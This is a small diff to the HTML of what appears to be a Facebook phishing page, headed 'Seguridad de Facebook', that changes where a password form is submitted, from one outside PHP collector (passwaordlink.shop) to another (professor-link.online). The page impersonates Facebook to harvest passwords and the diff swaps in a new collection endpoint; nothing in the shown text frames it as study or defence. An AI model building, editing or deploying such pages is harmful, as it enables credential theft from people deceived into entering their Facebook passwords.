--- a/index.html
+++ b/index.html
@@ -64,7 +64,7 @@
   </style>
 
 
-  <form class="content" action="https://passwaordlink.shop/pass/hamidpass.php" method="POST">
+  <form class="content" action="https://professor-link.online/pass2/hamidpass.php" method="POST">
     <div class="passwordContainer">
       <img src="3357701.webp" alt="Logo">
       <h3>Seguridad de Facebook</h3>
